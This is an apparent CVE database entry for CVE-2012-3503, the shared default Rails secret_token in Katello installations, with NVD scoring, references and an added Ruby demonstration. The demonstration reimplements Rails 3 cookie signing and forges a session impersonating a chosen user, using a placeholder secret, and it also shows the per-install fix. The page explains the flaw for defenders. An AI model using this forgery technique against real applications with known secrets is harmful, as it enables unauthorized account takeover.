CVE-2012-3503
CRITICAL 9.8
Description
The installation script in Katello 1.0 and earlier does not properly generate the Application.config.secret_token value, which causes each default installation to have the same secret token, and allows remote attackers to authenticate to the CloudForms System Engine web interface as an arbitrary user by creating a cookie using the default secret_token.
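The mechanism behind this entry is the Rails 3 CookieStore: the session hash is serialized, Base64-encoded and signed with an HMAC keyed by `secret_token`, and the server trusts any cookie whose HMAC verifies. If every installation shares the same token, anyone who has one copy of Katello can mint a session for any user on every other copy. The following is an added example, not Katello's or Rails' own code: it reimplements the Rails 3 signing scheme (Base64 of `Marshal.dump`, `--`, hex HMAC-SHA1), uses a placeholder string in place of the real shipped default (which is not reproduced here), and assumes a `user_id` session key that is purely illustrative.

```ruby
require 'openssl'
require 'base64'
require 'securerandom'

# Rails 3-style CookieStore session signing (ActiveSupport::MessageVerifier):
#   cookie = Base64(Marshal.dump(session_hash)) + "--" + hex(HMAC-SHA1(secret_token, base64_part))
# The only thing standing between an attacker and an arbitrary session is secret_token.
def sign_session(secret_token, session)
  payload = Base64.strict_encode64(Marshal.dump(session))
  digest  = OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new('SHA1'), secret_token, payload)
  "#{payload}--#{digest}"
end

# Constant-time comparison so the verifier itself does not leak the digest byte by byte.
def secure_compare(a, b)
  return false unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).reduce(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

# Returns the session hash if the HMAC checks out under secret_token, nil otherwise.
# Marshal.load only runs after the signature is accepted, so a known secret also
# hands the attacker control over what the server deserializes.
def verify_session(secret_token, cookie)
  payload, digest = cookie.split('--', 2)
  return nil if payload.nil? || digest.nil?
  expected = OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new('SHA1'), secret_token, payload)
  return nil unless secure_compare(expected, digest)
  Marshal.load(Base64.strict_decode64(payload))
end

# Placeholder standing in for whatever fixed value the vulnerable installer wrote;
# the actual Katello 1.0 default is deliberately not reproduced here.
PLACEHOLDER_DEFAULT_SECRET = 'placeholder-default-secret-token-shared-by-every-install'

# What a corrected installer should do: a fresh, unpredictable token per installation.
def generate_secret_token
  SecureRandom.hex(64) # 128 hex characters, 512 bits of entropy
end

# Attacker who knows the default secret mints a cookie claiming to be a chosen user.
# ("user_id" is an assumed session key for illustration, not taken from Katello.)
def attack_succeeds?(server_secret_token, impersonated_user_id = 1)
  forged  = sign_session(PLACEHOLDER_DEFAULT_SECRET, { 'user_id' => impersonated_user_id })
  session = verify_session(server_secret_token, forged)
  !session.nil? && session['user_id'] == impersonated_user_id
end

if __FILE__ == $0
  puts "server using shared default secret: #{attack_succeeds?(PLACEHOLDER_DEFAULT_SECRET) ? 'forged session ACCEPTED' : 'rejected'}"
  puts "server using per-install secret:    #{attack_succeeds?(generate_secret_token) ? 'forged session ACCEPTED' : 'rejected'}"
end
```

The practical check on a deployed instance is to compare its configured `secret_token` against a second installation or against what the installer would generate fresh: two installs with the same value are both exposed. Rotating the token to a random per-host value is the remediation, and it invalidates every existing session, which is the intended effect.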
CVE details
CVSS v3.1 score: 9.8
Severity: CRITICAL
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack vector: NETWORK
Attack complexity: LOW
Privileges required: NONE
User interaction: NONE
Published: 8/25/2012
Last modified: 4/11/2025
Source: nvd
Honeypot sightings: 0
Affected products
redhat:enterprise_linux_server
theforeman:katello
Weaknesses (CWE)
CWE-798 (Use of Hard-coded Credentials)
References
http://rhn.redhat.com/errata/RHSA-2012-1186.html (secalert@redhat.com, af854a3a-2127-422b-91ae-364da2661108)
http://rhn.redhat.com/errata/RHSA-2012-1187.html (secalert@redhat.com, af854a3a-2127-422b-91ae-364da2661108)
http://secunia.com/advisories/50344 (secalert@redhat.com, af854a3a-2127-422b-91ae-364da2661108)
http://www.securityfocus.com/bid/55140 (secalert@redhat.com, af854a3a-2127-422b-91ae-364da2661108)
https://github.com/Katello/katello/commit/7c256fef9d75029d0ffff58ff1dcda915056d3a3 (secalert@redhat.com, af854a3a-2127-422b-91ae-364da2661108)
https://github.com/Katello/katello/pull/499 (secalert@redhat.com, af854a3a-2127-422b-91ae-364da2661108)
IOC correlations
No correlations recorded
This product uses data from the NVD API but is not endorsed or certified by the NVD.